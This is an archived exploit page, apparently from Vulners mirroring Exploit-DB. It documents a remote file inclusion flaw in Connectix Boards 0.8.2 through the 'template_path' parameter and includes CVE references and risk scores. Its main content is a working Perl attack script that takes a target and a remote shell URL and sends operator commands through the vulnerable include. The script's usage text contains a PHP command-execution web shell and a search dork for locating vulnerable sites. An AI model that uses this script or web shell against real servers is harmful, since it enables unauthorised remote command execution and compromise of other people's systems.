Lucene search
+L

Connectix Boards 0.8.2 - 'template_path' Remote File Inclusion

🗓️ 30 Jan 2008 00:00:00Reported by HoussamixType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 40 Views

Connectix Boards 0.8.2 remote file inclusion vulnerability in 'template_path

Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2008-0502
31 Jan 200819:30
cve
Cvelist
CVE-2008-0502
31 Jan 200819:30
cvelist
EUVD
EUVD-2008-0512
7 Oct 202500:30
euvd
NVD
CVE-2008-0502
31 Jan 200820:00
nvd
Prion
Remote file inclusion
31 Jan 200820:00
prion
#!/usr/bin/perl
#
# Author : HouSSaMix From H-T Team
# Script : Connectix Boards (  Tested in last version 0.8.2 & 0.8.1 )
# Bug : Remote File Inclusion
# Vulnerable Code : <?php include ($template_path.'menu_links.php'); ?>
# Dork : powered by connectix boards
# Risk : High
# Download : http://www.connectix-boards.org/
# Exploit: http://Target.il/[path]/templates/Official/part_userprofile.php?template_path=[Shell]

use LWP::Simple;

print "-------------------------[ H-T Team ]--------------------------\n";
print "-                                                             -\n";
print "-         Connectix Boards <=0.8.2  - Remote File Inclusion   -\n";
print "-                                                             -\n";
print "---------------------------------------------------------------\n";
print "-       H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo        -\n";
print "-       Bug found and Coded By HouSSaMix & ToXiC350           -\n";
print "---------------------------------------------------------------\n\n";

my $morocco,$path,$shell,$conexiune,$cmd,$data ;


if ((!$ARGV[0]) || (!$ARGV[1])) { &usage;exit(0);}

$path = $ARGV[0];
chomp($path);
$shell = $ARGV[1];
chomp($shell);

$path = $path."/templates/Official/part_mps.php";


sub usage(){
       print "=> Usage: perl $0 Target/path http://site.com/cmd.txt\n";
       print "=> Ex   : perl $0 http://site.com/forum http://site.com/cmd.txt\n";
	   print "Code of file cmd.txt : \n";
       print '<?php ob_clean();ini_set("max_execution_time",0);passthru($_GET["cmd"]);die;?>';
	   print "   \n";
          }

while ()
{
print "Enter your command :~\$ ";
chomp($cmd=<STDIN>);
if ($cmd eq "exit") { exit(0);}

$morocco = $path."?template_path=".$shell."?&cmd=".$cmd;
if ($cmd eq "")
 { print "Enter your command !\n"; }
else
 { $data=get($morocco); print $data ; }
}

# milw0rm.com [2008-01-30]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

09 Nov 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.02605
40